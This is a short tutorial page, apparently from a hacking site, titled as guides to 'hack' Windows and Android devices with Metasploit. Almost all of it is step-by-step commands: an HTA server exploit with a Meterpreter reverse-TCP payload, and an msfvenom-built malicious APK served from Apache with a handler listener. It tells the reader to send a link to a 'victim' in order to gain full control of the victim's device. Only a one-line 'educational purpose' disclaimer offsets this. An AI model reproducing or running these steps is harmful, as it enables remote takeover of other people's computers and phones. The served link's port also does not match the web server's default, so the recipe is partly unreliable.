METASPLOIT

(only for educational purpose and we are not responsible for any illegal activities.)

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

METASPLOIT works best in kali linux.

we assume that you are using kali linux.Please refer our kali linux page regarding information about kali linux.

metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

kali linux

Kali Linux is a Debian-derived Linux distribution designed for digital forensics and penetration testing. It is maintained and funded by Offensive Security.

How to Hack windows with HTA application.

For knowing your ip address Type 'ifconfig'

LETS BEGIN......

1)Type 'msfconsole' in kali linux terminal

2)type 'use exploit/windows/misc/hta_server'

3)Type 'set lhost (your ip address)

4)Type 'set srvhost (your ip address)'

5)Type 'set payload windows/meterpreter/reverse_tcp'

6)Type 'set lport 8111

7)Type 'exploit'

we will automatically get a link

after victim downloads the the file from the link we will get control of the windows machine.use the following command to get a shell of the machine.

8)sessions

9)sessions -i 1

How to Hack android with msfvenom

please follow the steps to use msfvenom

  1. msfvenom -p android/meterpreter/reverse_tcp LHOST=(YOUR IP ADDRESS) LPORT=4444 R > /var/www/html/androidapp.apk

  2. service apache2 start

  3. msfconsole

  4. use exploit/multi/handler

  5. set payload android/meterpreter/reverse_tcp

  6. set LHOST (YOUR IP ADDRESS)

  7. exploit

give the victim the link (your ip address):8001/androidapp.apk

when the victim downloads the app we will get the full control of the android device